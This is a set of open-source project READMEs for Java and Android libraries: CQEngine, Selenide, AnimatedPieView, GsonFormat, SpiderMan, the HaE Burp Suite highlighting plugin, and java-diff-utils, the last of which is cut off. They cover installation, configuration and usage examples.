Metadata and Statistics from MetadataEngine ## The [MetadataEngine](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/metadata/MetadataEngine.html), is a high-level API which can retrieve metatadata and statistics from indexes which have been added to the collection. It provides access to the following: * Frequency distributions (the counts of each attribute value stored in an index) * Distinct keys (the distinct attribute values in an index, optionally within a range between x and y) * Streams of attribute values and associated objects stored in an index (ascending/descending order, optionally within a range between x and y) * Count of distinct keys (how many distinct attribute values are in an index) * Count for a specific key (how many objects match a specific attribute value) For more information, see JavaDocs for: [MetadataEngine](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/metadata/MetadataEngine.html), [AttributeMetadata](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/metadata/AttributeMetadata.html), [SortedAttributeMetadata](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/metadata/SortedAttributeMetadata.html) --- ## Using CQEngine with Hibernate / JPA / ORM Frameworks ## CQEngine has seamless integration with JPA/ORM frameworks such as Hibernate or EclipseLink. Simply put, CQEngine can build indexes on, and query, any type of Java collection or arbitrary data source. ORM frameworks return entity objects loaded from database tables in Java collections, therefore CQEngine can act as a very fast in-memory query engine on top of such data. --- ## Usage in Maven and Non-Maven Projects ## CQEngine is in Maven Central, and can be added to a Maven project as follows: ``` <dependency> <groupId>com.googlecode.cqengine</groupId> <artifactId>cqengine</artifactId> <version>x.x.x</version> </dependency> ``` See [ReleaseNotes](documentation/ReleaseNotes.md) for the latest version number. For non-Maven projects, a version built with [maven-shade-plugin](http://maven.apache.org/plugins/maven-shade-plugin/) is also provided, which contains CQEngine and all of its own dependencies packaged in a single jar file (ending "-all"). It can be downloaded from Maven central as "-all.jar" [here](http://search.maven.org/#search%7Cgav%7C1%7Cg%3A%22com.googlecode.cqengine%22%20AND%20a%3A%22cqengine%22). --- ## Using CQEngine in Scala, Kotlin, or other JVM languages ## CQEngine should generally be compatible with other JVM languages besides Java too, however it can be necessary to apply a few tricks to make it work. See [OtherJVMLanguages.md](documentation/OtherJVMLanguages.md) for some tips. --- ## Related Projects ## * CQEngine is somewhat similar to [Microsoft LINQ](http://en.wikipedia.org/wiki/Language_Integrated_Query), but a difference is LINQ queries on collections are evaluated via iteration/filtering whereas CQEngine uses set theory, thus CQEngine would outperform LINQ * [Concurrent Trees](http://github.com/npgall/concurrent-trees/) provides Concurrent Radix Trees and Concurrent Suffix Trees, used by some indexes in CQEngine --- ## Project Status ## * CQEngine 3.6.0 is the current release as of writing (January 2021), and is in Maven central * A [ReleaseNotes](documentation/ReleaseNotes.md) page has been added to document changes between releases * API / JavaDocs are available [here](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/index.html) Report any bugs/feature requests in the [Issues](http://github.com/npgall/cqengine/issues) tab. For support please use the [Discussion Forum](http://groups.google.com/forum/#!forum/cqengine-discuss), not direct email to the developers. Many thanks to JetBrains for supporting CQEngine with free IntelliJ licenses! [![](documentation/images/logo_jetbrains.png)](http://www.jetbrains.com)[![](documentation/images/logo_intellij_idea.png)](http://www.jetbrains.com/idea/)
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Selenide is a framework for writing easy-to-read and easy-to-maintain automated tests in Java. It defines concise fluent API, natural language assertions and does some magic for ajax-based applications to let you focus entirely on the business logic of your tests. Selenide is based on and is compatible to Selenium WebDriver 4.0+ ```java @Test public void login() { open("/login"); $(By.name("user.name")).setValue("johny"); $("#submit").click(); $("#username").shouldHave(text("Hello, Johny!")); } ``` Look for [detailed comparison of Selenide and Selenium WebDriver API](https://github.com/selenide/selenide/wiki/Selenide-vs-Selenium). #### Selenide for mobile apps You can use Selenide for testing mobile applications. See plugin [selenide-appium](https://github.com/selenide/selenide/tree/main/modules/appium). #### Selenide with Selenoid You can use Selenide for running tests in Selenoid containers. See plugin [selenide-selenoid](https://github.com/selenide/selenide/tree/main/modules/selenoid). #### Selenide with Selenium Grid You can use Selenide for running tests in Selenium Grid. See plugin [selenide-grid](https://github.com/selenide/selenide/tree/main/modules/grid). ## Changelog Here is [CHANGELOG](https://github.com/selenide/selenide/blob/main/CHANGELOG.md) ## How to start? Just put selenide.jar to your project and import the following methods: `import static com.codeborne.selenide.Selenide.*;` Look for [Quick Start](https://github.com/selenide/selenide/wiki/Quick-Start) for details. ## Resources * First of all, [selenide.org](http://selenide.org) * For bustlers: [How to start writing UI tests in 10 minutes](http://selenide.org/2014/10/01/how-to-start-writing-ui-tests/) * For developers: [Selenide presentation on Devoxx 2015](http://selenide.org/2015/11/13/selenide-on-devoxx/) * For QA engineers: [Selenide presentation on SeleniumConf 2015](http://selenide.org/2015/09/23/selenide-on-seleniumconf/) * For russians: [Selenide presentation on SeleniumCamp 2015](http://seleniumcamp.com/materials/good-short-test/) ## FAQ See [Frequently asked questions](http://selenide.org/faq.html) ## Posts - Set-up environment with gradle, junit5, allure and selenide -- read a [post](https://medium.com/@rosolko/simple-allure-2-configuration-for-gradle-8cd3810658dd) on medium, grab from [GitHub](https://github.com/rosolko/allure-gradle-configuration) - Small step do dramatically improve your tests speed -- read a [post](https://medium.com/@rosolko/boost-you-autotests-with-fast-authorization-b3eee52ecc19) on medium - Another way to improve tests speed -- read a [post](https://medium.com/@rosolko/fast-authorization-level-local-storage-6c84e9b3cef1) on medium - [Configure Selenide to work with Selenoid](https://medium.com/@rosolko/configure-selenide-to-work-with-selenoid-8835cd6dc7d2) ## Contributing Contributions to Selenide are both welcomed and appreciated. See [CONTRIBUTING.md](CONTRIBUTING.md) for specific guidelines. Feel free to fork, clone, build, run tests and contribute pull requests for Selenide! ## Authors Selenide was originally designed and developed by [Andrei Solntsev](http://asolntsev.github.io/) in 2011-2021 and is maintained by [a group of enthusiast](https://github.com/orgs/selenide/people). ## Thanks Many thanks to these incredible tools that help us create open-source software: [![Intellij IDEA](https://cloud.google.com/tools/images/icon_IntelliJIDEA.png)](http://www.jetbrains.com/idea) [![YourKit Java profiler](http://selenide.org/images/yourkit.png)](https://www.yourkit.com/features/) [![BrowserStack](https://www.browserstack.com/images/mail/browserstack-logo-footer.png)](https://www.browserstack.com) ## License Selenide is open-source project, and distributed under the [MIT](http://choosealicense.com/licenses/mit/) license
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AnimatedPieView --- **一个好吃的甜甜圈?请问客官要啥口味捏-V-** [**English Doc**](https://github.com/razerdp/AnimatedPieView/blob/master/README_EN.md) [![jcenter](https://api.bintray.com/packages/razerdp/maven/AnimatedPieView/images/download.svg)](https://bintray.com/razerdp/maven/AnimatedPieView/_latestVersion) [![license](https://img.shields.io/badge/license-Apache--2.0-blue.svg)](https://github.com/razerdp/AnimatedPieView/blob/master/LICENSE) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-AnimatedPieView-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/6507) [![Api](https://img.shields.io/badge/Api-14%2B-green.svg)](https://img.shields.io/badge/Api-14%2B-green.svg) [![Author](https://img.shields.io/badge/Author-razerdp-blue.svg)](https://github.com/razerdp) 开发进度 (更新日志->[日志](https://github.com/razerdp/AnimatedPieView/blob/master/UPDATE_LOG.md)) --- > 如果您有别的需求,可以提交您的issue哦,当然,也可以直接修改源码-V- * ~~支持TypeFace~~ * ~~点选文字或图表选中甜甜圈~~ * ~~增加默认选中支持~~ * ~~增加图例支持~~ * ~~增加删除数据的方法~~ * ~~增加描述标签支持~~ * ~~项目优化/重构,1.2.0发布~~ * ~~允许alpha突出选中的甜甜圈~~ * ~~允许甜甜圈之间含有间隔~~ * ~~文字自适应点击动画位置~~ * ~~文字描述动画~~ * ~~有文字描述的甜甜圈~~ * ~~点击事件回调的甜甜圈~~ * ~~点击动画的甜甜圈~~ * ~~可以点击的甜甜圈~~ * ~~可以变成大饼的甜甜圈~~ * ~~动画长大的甜甜圈~~ 主要功能 --- | 描述 | 方法 | 预览 | | -------- | :----- | ---- | | 动画生长 | -- | ![pie_animation](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_animation.gif) | | 饼图/甜甜圈转换 | strokeMode(boolean) | ![pie_switch](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_switch.gif) | | 角度间隙 | splitAngle(float) | ![pie_split_angle](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_split_angle.gif) | | 绘制文字 | drawText(true) | ![pie_with_text](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_with_text.gif) | | 点击效果 | canTouch(true) / selectListener() | ![pie_click_effect](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_click_effect.gif) | | 焦点甜甜圈效果 (反向) | focusAlphaType(<br>AnimatedPieViewConfig.FOCUS_WITH_ALPHA_REV,150<br>) | ![pie_click_with_focus_alpha_type_rev](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_click_with_focus_alpha_type_rev.gif) | | 焦点甜甜圈效果 | focusAlphaType(<br>AnimatedPieViewConfig.FOCUS_WITH_ALPHA,150<br>) | ![pie_click_with_focus_alpha_type](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_click_with_focus_alpha_type.gif) | | 甜甜圈标签 | IPieInfo.PieOption | ![pie_option](https://github.com/razerdp/AnimatedPieView/blob/master/art/pie_option.png) | 依赖 --- 添加依赖(请把{latestVersion}替换成上面的jcenter标签所示版本) ```xml dependencies { implementation 'com.github.razerdp:AnimatedPieView:{latestVersion}' } ``` 基本使用方式(简单的超乎想像) --- **step 1:定义任意类实现IPieInfo接口(如果懒,可以使用SimplePieInfo)** ```java public class Test implements IPieInfo { @Override public float getValue() { //这个数值将会决定其所占有的饼图百分比 return 0.5f; } @Override public int getColor() { //该段甜甜圈的颜色,请返回@colorInt,不要返回@colorRes return Color.WHITE; } @Override public String getDesc() { //描述文字,可不返回 return "这是一个测试"; } @Nullable @Override public PieOption getPieOpeion() { //一些别的设置,比如标签 return mPieOption; } } ``` **step 2:定义config并配置就可以了** ```java AnimatedPieView mAnimatedPieView = findViewById(R.id.animatedPieView); AnimatedPieViewConfig config = new AnimatedPieViewConfig(); config.startAngle(-90)// 起始角度偏移 .addData(new SimplePieInfo(30, getColor("FFC5FF8C"), "这是第一段"))//数据(实现IPieInfo接口的bean) .addData(new SimplePieInfo(18.0f, getColor("FFFFD28C"), "这是第二段")) ...(尽管addData吧) .duration(2000);// 持续时间 // 以下两句可以直接用 mAnimatedPieView.start(config); 解决,功能一致 mAnimatedPieView.applyConfig(config); mAnimatedPieView.start(); ``` 进阶用法(所有配置都在config,and...相信我,我提供大多数配置,但日常用到的,其实不多哈哈) --- ```java AnimatedPieViewConfig mConfig=mAnimatedPieView.getConfig(); mConfig.animOnTouch(true)// 点击事件是否播放浮现动画/回退动画(默认true) .addData(IPieInfo info, boolean autoDesc)// 添加数据,autoDesc:是否自动补充描述?(百分比) .floatExpandAngle(15f)// 点击后圆弧/扇形扩展的角度 .floatShadowRadius(18f)// 点击后的阴影扩散范围 .floatUpDuration(500)// 点击浮现动画时间 .floatDownDuration(500)// 上一个浮现的圆弧回退的动画时间 .floatExpandSize(15)// 点击后扇形放大数值,,只对饼图有效 .strokeMode(true)// 是否只画圆弧【甜甜圈哈哈】,否则画扇形(默认true) .strokeWidth(15)// 圆弧(甜甜圈)宽度 .duration(2500)// 动画时间 .startAngle(-90f)// 开始的角度 .selectListener(new OnPieSelectListener<IPieInfo>())//点击事件 .drawText(true)// 是否绘制文字描述 .textSize(12)// 绘制的文字大小 .textMargin(8)// 绘制文字与导航线的距离 .autoSize(true)// 自动测量甜甜圈半径 .pieRadius(100)// 甜甜圈半径 .pieRadiusRatio(0.8f)// 甜甜圈半径占比 .guidePointRadius(2)// 设置描述文字的开始小点的大小 .guideLineWidth(4)// 设置描述文字的指示线宽度 .guideLineMarginStart(8)// 设置描述文字的指示线开始距离外圆半径的大小 .textGravity(AnimatedPieViewConfig.ABOVE)// 设置描述文字方向 【 -AnimatedPieViewConfig.ABOVE:文字将会在导航线上方绘制 -AnimatedPieViewConfig.BELOW:文字在导航线下方绘制 -AnimatedPieViewConfig.ALIGN:文字与导航线对齐 -AnimatedPieViewConfig.ECTOPIC:文字在1、2象限部分绘制在线的上方,在3、4象限绘制在线的下方 】 .canTouch(true)// 是否允许甜甜圈点击放大 .typeFae(TypeFace)// 字体样式 .splitAngle(1)// 甜甜圈间隙角度 .focusAlphaType(AnimatedPieViewConfig.FOCUS_WITH_ALPHA_REV,150)// 焦点甜甜圈的alpha表现形态及alpha削减值 .interpolator(new DecelerateInterpolator())// 动画插值器 .focusAlpha(150) // 选中的/或者非选中的甜甜圈的alpha值(跟focusAlphaType挂钩) .legendsWith((ViewGroup) findViewById(R.id.ll_legends), new OnPieLegendBindListener<BasePieLegendsView>() { @Override public BasePieLegendsView onCreateLegendView(int position, IPieInfo info) { return position % 2 == 0 ? DefaultPieLegendsView.newInstance(MainActivity.this) : DefaultCirclePieLegendsView.newInstance(MainActivity.this); } @Override public boolean onAddView(ViewGroup parent, BasePieLegendsView view) { return false; } }); //图例支持 ``` --- 更多配置: ----- 在IPieInfo中,你可以配置`PieOption`以扩展每个甜甜圈的行为 ```java @Nullable @Override public PieOption getPieOption() { return new PieOption() .setDefaultSelected(true) // 默认选中 .setIconHeight(50) // 图标的高度 .setIconWidth(50) //图标宽度 .setIconScaledHeight(0.5f) // 图标高度缩放 .setIconScaledWidth(0.5f) // 图标宽度缩放 .setLabelIcon(bitmap) // 图标资源 .setLabelPadding(5) // 图标与文字的距离 .setLabelPosition(PieOption.NEAR_PIE); // 图标在甜甜圈内侧 } ``` 打赏(看在我那么努力维护的份上。。。给个零食呗~) --- | 微信 |支付宝 | | ---- | ---- | | ![](https://github.com/razerdp/FriendCircle/blob/master/wechat.png) | ![](https://github.com/razerdp/FriendCircle/blob/master/alipay.png) | 控件思路【按思路顺序更新】 --- [一起弄个甜甜圈吧](https://github.com/razerdp/Article/blob/master/%E4%B8%80%E8%B5%B7%E6%92%B8%E4%B8%AA%E7%94%9C%E7%94%9C%E5%9C%88.md) LICENSE --- [Apache-2.0](https://github.com/razerdp/AnimatedPieView/blob/master/LICENSE)
根据Gson库使用的要求,将JSONObject格式的String 解析成实体
gsonformat ide jetbrains
GsonFormat ------ [jetbrains](https://plugins.jetbrains.com/plugin/7654?pr=androidstudio) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-GsonFormat-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/1896) [swift](https://github.com/EnjoySR/ESJsonFormat-Xcode) [Json Annotation](https://github.com/tianzhijiexian/JsonAnnotation) [中文Readme](README_CN.md) This is a plugin you can generate Json model from Json String. Please do aware **This Plugin is only for Android Studio and IntelliJ IDEA**. ## Install - Using IDE built-in plugin system on Windows: - <kbd>File</kbd> > <kbd>Settings</kbd> > <kbd>Plugins</kbd> > <kbd>Browse repositories...</kbd> > <kbd>Search for "GsonFormat"</kbd> > <kbd>Install Plugin</kbd> - Using IDE built-in plugin system on MacOs: - <kbd>Preferences</kbd> > <kbd>Settings</kbd> > <kbd>Plugins</kbd> > <kbd>Browse repositories...</kbd> > <kbd>Search for "GsonFormat"</kbd> > <kbd>Install Plugin</kbd> - Manually: - Download the [latest release](https://github.com/zzz40500/GsonFormat/releases/latest) and install it manually using <kbd>Preferences</kbd> > <kbd>Plugins</kbd> > <kbd>Install plugin from disk...</kbd> - From official jetbrains store from [download](https://plugins.jetbrains.com/plugin/7654?pr=androidstudio) Restart IDE. ## Usage ### Use IDE menu ![Generate.png](http://upload-images.jianshu.io/upload_images/166866-2c5168c72b7155ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) ### Use hotkey Default **Option + s**(Mac), **Alt + s** (win) You can change the hotkey via: ![修改快捷键.png](http://upload-images.jianshu.io/upload_images/166866-f9e20ca0ad7b9ae4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) ## Demo picture ![gsonFormat.gif](http://upload-images.jianshu.io/upload_images/166866-ff9dc336af72d7d7.gif?imageMogr2/auto-orient/strip) ## Version Info v1.2.2 > * Supports field type changes. * Supports shortcut to open GsonFormat, default option + s (mac), alt + s (win) * Support for field name changes. * Support to add the prefix field. * Support for multiple conversion libraries (Gson, Jackjson, FastJson, LoganSquare). * Support for private and public modes. * Supports filtering of superclass into existing fields. ## License Copyright 2014 The GsonFormat Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
🔥🔥🔥 - 崩溃日志手机端显示 ,测试妹妹的最爱,开发哥哥的小棉袄
# SpiderMan [![](https://jitpack.io/v/simplepeng/SpiderMan.svg)](https://jitpack.io/#simplepeng/SpiderMan)![MIT](https://img.shields.io/badge/License-Apache%202.0-blue.svg?style=flat-square) ![](https://img.shields.io/badge/API-14%2B-brightgreen?style=flat-square) ![](https://img.shields.io/badge/Size-40k-yellow?style=flat-square) ![](https://img.shields.io/badge/Author-simplepeng-red?style=flat-square) SpiderMan能为您做的事: * 在Android手机上自动显示闪退崩溃信息,直接分享给相关开发人员! * 再也不用担心测试妹妹给你重现怎样操作才能触发闪退崩溃的尴尬! * 再也不用担心产品给你说哪儿哪儿会闪退崩溃,但是又不能场景还原的无奈! * 再也不用担心某些国产Rom禁止异常log输出! * 再也不用担心开发工具异常log信息输出时灵时不灵! | Debug环境 | Share | | :-----------------------------------: | :------------------------------------------------: | | ![crash_info](statics/crash_info.png) | ![crash_info_share](statics/crash_info_share.png) | ## 引入依赖 从`v1.1.8`开始使用`jitpack`仓库,记得添加`jitpack`仓库的引用。 ```groovy maven { url 'https://jitpack.io' } ``` 在`app`的`build.gradle`引入依赖: ```groovy def spider_man = "v1.1.9" ``` ### 方式一 ```groovy debugImplementation "com.github.simplepeng.SpiderMan:spiderman:${spider_man}" releaseImplementation "com.github.simplepeng.SpiderMan:spiderman-no-op:${spider_man}" ``` ### 方式二 ```java implementation "com.github.simplepeng.SpiderMan:spiderman:${spider_man}" ``` 上面`方式一`debug环境有奔溃信息提示,release环境则没有,`方式二`都有,但是记得添加混淆。 ## 直接显示错误页面 有时候可能因为一些特殊环境下才会发生的崩溃很难复现,所以我们不得以会将一些代码放到`try/catch`中运行,这样虽然保证了可以不崩溃,但是当发生崩溃时又会很容易忽略掉错误信息。现在我们可以直接在`catch`代码块中调用`SpiderMan.show(Throwable e)`方法,这样就可以直接显示崩溃提示页面。 ```java try { String text = null; text.toUpperCase(); } catch (Exception e) { SpiderMan.show(e); } ``` ## Crash回调 发生crash时,如果你希望能拿到异常信息,保存到本地或者其他自定义操作,那么你可以使用下面的回调方法。 ```java //回调crash SpiderMan.setOnCrashListener(new SpiderMan.OnCrashListener() { @Override public void onCrash(Thread t, Throwable ex) { saveCrash(t, ex); } }); ``` `SpiderManUtils`提供了一些封装好的方法,例如`saveTextToFile`,`parseCrash`,自行按需使用。 如果release也需要回调,请使用release回调库,从`1.1.9`开始提供。 ```groovy releaseImplementation "com.github.simplepeng.SpiderMan:spiderman-callback:${spider_man}" ``` ## 冲突 ### androidx 项目已经依赖了`androidx.appcompat:appcompat`包,如果产生冲突请使用下面的方式依赖。 ```groovy debugImplementation("com.github.simplepeng.SpiderMan:spiderman:${spider_man}") { exclude group: "androidx.appcompat" } releaseImplementation("com.github.simplepeng.SpiderMan:spiderman-no-op:${spider_man}") { exclude group: "androidx.appcompat" } ``` ### support 项目已经依赖了`com.android.support:appcompat-v7`包,如果产生冲突请使用下面的方式依赖。 ```groovy debugImplementation("com.github.simplepeng.SpiderMan:spiderman:${spider_man}") { exclude group: "com.android.support" } releaseImplementation("com.github.simplepeng.SpiderMan:spiderman-no-op:${spider_man}") { exclude group: "com.android.support" } ``` ## 混淆 ```java -keep class com.simple.spiderman.** { *; } -keepnames class com.simple.spiderman.** { *; } -keep public class * extends android.app.Activity -keep class * implements Android.os.Parcelable { public static final Android.os.Parcelable$Creator *; } # support -keep public class * extends android.support.annotation.** { *; } -keep public class * extends android.support.v4.content.FileProvider # androidx -keep public class * extends androidx.annotation.** { *; } -keep public class * extends androidx.core.content.FileProvider ``` ## 自定义界面样式 ```java SpiderMan.setTheme(R.style.SpiderManTheme_Dark); ``` `SpiderMan`内置了两种主题样式`light`和`dark`。 | light | dark | custom | | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | | ![](https://i.loli.net/2019/02/24/5c726ef04a909.png) | ![](https://i.loli.net/2019/02/24/5c726f0dc7159.png) | ![](https://i.loli.net/2019/02/24/5c72a0f278b9b.png) | 所有自定义属性定义在`attrs.xml`中 * smToolbar:toolbar的背景色 * smToolbarText:toolb title的颜色 * smToolbarShareText:分享文字按钮的颜色 * smContentBackground:toolb下方内容的背景色 * smIdentText:标签名字的颜色 * smDescText:标签描述的颜色 具体可以参考`app`中的用法。 ## 赞助 如果您觉得`SpideMan`帮助了您,可选择精准扶贫🙇🙇🙇 您的支持是作者继续努力创作的动力😁😁😁 萌戳下方链接精准扶贫⤵️⤵️⤵️ **[扶贫方式](https://simplepeng.github.io/merge_pay_code/)** ## 技术支持Q群:1078185041 <img src="statics/q_group.jpg" width="270px" height="370px"> ## 版本迭代 * v1.1.9:增加`crash-callback`module,升级gradle版本 * v1.1.8:使用`jitpack`仓库 * v1.1.7: 自动初始化 * v1.1.6: 解决view id重名引发的bug * v1.1.5: 增加`cpu-abi`,`versionCode`,`versionName`输出 * v1.1.4: 切换到androidx * v1.1.3: change minSdkVersion to 14 * v1.1.2: 解决FileProvider file_path重名bug(bug来源LuckSiege/PictureSelector) * v1.1.1: 新增直接显示错误页面的方法`SpiderMan.show(Throwable e)`,优化错误类型 * v1.1.0: 增加自定义界面主题和国际化 * v1.0.9: 增加appcompat包冲突解决方案 * v1.0.8: 发现很多小伙伴不会代理异常收集,所以删除了异常回调 * v1.0.7: 删除spiderman-no-op never-crash,优化报错类型显示 * v1.0.6: 增加spiderman-no-op * v1.0.5: 奔溃文本分享美化排版 * v1.0.4: 崩溃输出改为error级别 * v1.0.3: 增加 拷贝/分享 崩溃文字/图片信息 * v1.0.2: 重构,新增设备信息 * v1.0.1: 去除 allowBackup,label * v1.0.0: 首次上传
HaE - Highlighter and Extractor, Empower ethical hacker for efficient operations.
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<div align="center"> <img src="images/logo.png" style="width: 20%" /> <h4><a href="https://gh0st.cn/HaE/">赋能白帽,高效作战!</a></h4> <h5>第一作者: <a href="https://github.com/gh0stkey">EvilChen</a>(中孚信息元亨实验室), 第二作者: <a href="https://github.com/0chencc">0chencc</a>(米斯特安全团队)</h5> </div> ## 项目介绍 **HaE**是一个基于`BurpSuite Java插件API`开发的辅助型框架式插件,旨在实现对HTTP消息的高亮标记和信息提取。该插件通过自定义正则表达式匹配响应报文或请求报文,并对匹配成功的报文进行标记和提取。 随着现代化Web应用采用前后端分离的开发模式,日常漏洞挖掘的过程中,捕获的HTTP请求流量也相应增加。若想全面评估一个Web应用,会花费大量时间在无用的报文上。**HaE的出现旨在解决这类情况**,借助HaE,您能够**有效减少**测试时间,将更多精力集中在**有价值且有意义**的报文上,从而**提高漏洞挖掘效率**。 **注**: 要想灵活的使用`HaE`,你需要掌握正则表达式阅读、编写、修改能力;由于`Java`正则表达式的库并没有`Python`的优雅或方便,所以HaE要求使用者必须用`()`将所需提取的表达式内容包含;例如你要匹配一个**Shiro应用**的响应报文,正常匹配规则为`rememberMe=delete`,如果你要提取这段内容的话就需要变成`(rememberMe=delete)`。 ## 使用方法 插件装载: `Extender - Extensions - Add - Select File - Next` 初次装载`HaE`会自动获取官方规则库`https://raw.githubusercontent.com/gh0stkey/HaE/gh-pages/Rules.yml`,配置文件(`Config.yml`)和规则文件(`Rules.yml`)会放在固定目录下: 1. Linux/Mac用户的配置文件目录:`~/.config/HaE/` 2. Windows用户的配置文件目录:`%USERPROFILE%/.config/HaE/` 除此之外,您也可以选择将配置文件存放在`HaE Jar包`的同级目录下的`/.config/HaE/`中,**以便于离线携带**。 ### 规则释义 HaE目前的规则一共有8个字段,分别是规则名称、规则正则、规则作用域、正则引擎、规则匹配颜色、规则敏感性。 详细的含义如下所示: | 字段 | 含义 | |-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | Name | 规则名称,主要用于简短概括当前规则的作用。 | | F-Regex | 规则正则,主要用于填写正则表达式。在HaE中所需提取匹配的内容需要用`(`、`)`将正则表达式进行包裹。| | S-Regex | 规则正则,作用及使用同F-Regex。S-Regex为二次正则,可以用于对F-Regex匹配的数据结果进行二次的匹配提取,如不需要的情况下可以留空。| | Format | 格式化输出,在NFA引擎的正则表达式中,我们可以通过`{0}`、`{1}`、`{2}`…的方式进行取分组格式化输出。默认情况下使用`{0}`即可。 | | Scope | 规则作用域,主要用于表示当前规则作用于HTTP报文的哪个部分。 | | Engine | 正则引擎,主要用于表示当前规则的正则表达式所使用的引擎。**DFA引擎**:对于文本串里的每一个字符只需扫描一次,速度快、特性少;**NFA引擎**:要翻来覆去标注字符、取消标注字符,速度慢,但是特性(如:分组、替换、分割)丰富。 | | Color | 规则匹配颜色,主要用于表示当前规则匹配到对应HTTP报文时所需标记的高亮颜色。在HaE中具备颜色升级算法,当出现相同颜色时会自动向上升级一个颜色进行标记。 | | Sensitive | 规则敏感性,主要用于表示当前规则对于大小写字母是否敏感,敏感(`True`)则严格按照大小写要求匹配,不敏感(`False`)则反之。 | ## 优势特点 1. 精细配置:高度自由的配置选项,以满足各类精细化场景需求。 2. 分类标签:使用标签对规则进行分类,便于管理和组织规则。 3. 高亮标记:在HTTP History页面,通过颜色高亮和注释判断请求的价值。 4. 易读配置:使用易读的YAML格式存储配置文件,方便阅读和修改。 5. 数据集合:将匹配到的数据、请求和响应集中在数据面板中,提高测试和梳理效率。 6. 简洁可视:清晰可视的界面设计,更轻松地了解和配置HaE,操作简单、使用便捷。 7. 颜色升级:内置颜色升级算法,避免“屠龙者终成恶龙”场景,突出最具价值的请求。 8. 实战规则:官方规则库是基于实战化场景总结输出,提升数据发现的有效性、精准性。 | 界面名称 | 界面展示 | | ------------------------ | ---------------------------------------------------- | | Rules(规则信息管理) | <img src="images/rules.png" style="width: 80%" /> | | Config(配置信息管理) | <img src="images/config.png" style="width: 80%" /> | | Databoard(数据集合面板) | <img src="images/databoard.png" style="width: 80%" /> | ## 文末随笔 正义感是一个不可丢失的东西。 如果你觉得HaE好用,可以打赏一下作者,给作者持续更新下去的动力! <div align=center> <img src="images/reward.jpeg" style="width: 30%" /> </div> ## 404StarLink 2.0 - Galaxy ![404StarLink Logo](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) `HaE` 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环,如果对 `HaE` 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 - [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
Diff Utils library is an OpenSource library for performing the comparison / diff operations between texts or some kind of data: computing diffs, applying patches, generating unified diffs or parsing them, generating diff output for easy future displaying (like side-by-side view) and so on.
computing-diffs diff diff-algorithm inline java java-diff-utils merge-text meyer tools unified-diffs
# java-diff-utils ## Status [![Build Status](https://travis-ci.org/java-diff-utils/java-diff-utils.svg?branch=master)](https://travis-ci.org/java-diff-utils/java-diff-utils) [![Build Status using Github Actions](https://github.com/java-diff-utils/java-diff-utils/workflows/Java%20CI%20with%20Maven/badge.svg)](https://github.com/java-diff-utils/java-diff-utils/actions?query=workflow%3A%22Java+CI+with+Maven%22) [![Codacy Badge](https://app.codacy.com/project/badge/Grade/002c53aa0c924f71ac80a2f65446dfdd)](https://www.codacy.com/gh/java-diff-utils/java-diff-utils/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=java-diff-utils/java-diff-utils&amp;utm_campaign=Badge_Grade) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.github.java-diff-utils/java-diff-utils/badge.svg)](http://maven-badges.herokuapp.com/maven-central/io.github.java-diff-utils/java-diff-utils) ## Intro Diff Utils library is an OpenSource library for performing the comparison operations between texts: computing diffs, applying patches, generating unified diffs or parsing them, generating diff output for easy future displaying (like side-by-side view) and so on. Main reason to build this library was the lack of easy-to-use libraries with all the usual stuff you need while working with diff files. Originally it was inspired by JRCS library and it's nice design of diff module. **This is originally a fork of java-diff-utils from Google Code Archive.** ## API Javadocs of the actual release version: [JavaDocs java-diff-utils](https://java-diff-utils.github.io/java-diff-utils/4.10/docs/apidocs/) ## Examples Look [here](https://github.com/java-diff-utils/java-diff-utils/wiki) to find more helpful informations and examples. These two outputs are generated using this java-diff-utils. The source code can also be found at the *Examples* page: **Producing a one liner including all difference information.** ```Java //create a configured DiffRowGenerator DiffRowGenerator generator = DiffRowGenerator.create() .showInlineDiffs(true) .mergeOriginalRevised(true) .inlineDiffByWord(true) .oldTag(f -> "~") //introduce markdown style for strikethrough .newTag(f -> "**") //introduce markdown style for bold .build(); //compute the differences for two test texts. List<DiffRow> rows = generator.generateDiffRows( Arrays.asList("This is a test senctence."), Arrays.asList("This is a test for diffutils.")); System.out.println(rows.get(0).getOldLine()); ``` This is a test ~senctence~**for diffutils**. **Producing a side by side view of computed differences.** ```Java DiffRowGenerator generator = DiffRowGenerator.create() .showInlineDiffs(true) .inlineDiffByWord(true) .oldTag(f -> "~") .newTag(f -> "**") .build(); List<DiffRow> rows = generator.generateDiffRows( Arrays.asList("This is a test senctence.", "This is the 